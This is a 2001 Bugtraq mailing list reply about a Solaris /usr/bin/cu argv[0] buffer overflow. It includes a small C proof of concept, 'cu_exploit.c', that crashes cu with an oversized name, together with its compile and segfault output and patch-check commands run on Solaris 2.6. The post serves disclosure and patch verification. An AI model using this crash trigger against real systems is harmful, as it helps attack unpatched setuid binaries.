Bugtraq mailing list archives
Re: Solaris /usr/bin/cu Vulnerability
From: Dan Harkless <dan-bugtraq () DILVISH SPEED NET>
Date: Mon, 29 Jan 2001 20:21:39 -0800
hal King <hck () UTK EDU> writes:
In Solaris 2.6 patch 106468-02 replaces cu in Sol 7 patch 108372-01 replaces it for gets() use. The script does SegFault in 8, but no core file... I am running 10/2000 revision and 108372 came out in may, so it's probably cool.
Are you implying the above patches fix the cu long hardlink name
vulnerability? This is not the case, at least on 2.6:
# cat > cu_exploit.c
#include <stdio.h>
void main(int argc,char **argv)
{
char *buf;
buf = (char *) malloc(atoi(argv[1])*sizeof(char));
memset(buf,0x41,atoi(argv[1])-1);
buf[atoi(argv[1])-1]=0;
execl("/usr/bin/cu",buf,(char *)0);
}
# gcc cu_exploit.c
cu_exploit.c: In function `main':
cu_exploit.c:4: warning: return type of `main' is not `int'
# a.out
Segmentation fault
# uname -a
SunOS shell1 5.6 Generic_105181-23 sun4m sparc SUNW,SPARCstation-5
# showrev -p | fgrep 106468-02
Patch: 106468-02 Obsoletes: Requires: Incompatibles: Packages: SUNWbnuu
# pkgchk -p /usr/bin/cu
ERROR: /usr/bin/cu
permissions <4111> expected <0111> actual
106468-02 was a patch from last summer, fixing an unspecified (but
presumably different) security problem in cu and uustat.
----------------------------------------------------------------------
Dan Harkless | To prevent SPAM contamination, please
dan-bugtraq () dilvish speed net | do not mention this private email
SpeedGate Communications, Inc. | address in Usenet posts. Thank you.
Current thread:
- Solaris /usr/bin/cu Vulnerability Pablo Sor (Jan 18)
- Re: Solaris /usr/bin/cu Vulnerability Tomas Cibulka (Jan 18)
- Re: Solaris /usr/bin/cu Vulnerability Juergen P. Meier (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Casper Dik (Jan 22)
- Re: Solaris /usr/bin/cu Vulnerability Juergen P. Meier (Jan 19)
- Solaris /usr/bin/cu Vulnerability hal King (Jan 23)
- Re: Solaris /usr/bin/cu Vulnerability Dan Harkless (Jan 30)
- <Possible follow-ups>
- Re: Solaris /usr/bin/cu Vulnerability Konrad Rieck (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Michael H. Warfield (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Wietse Venema (Jan 22)
- Re: Solaris /usr/bin/cu Vulnerability Michael H. Warfield (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability optyx (Jan 30)
- Re: Solaris /usr/bin/cu Vulnerability Dan Harkless (Jan 31)
- Re: Solaris /usr/bin/cu Vulnerability Tomas Cibulka (Jan 18)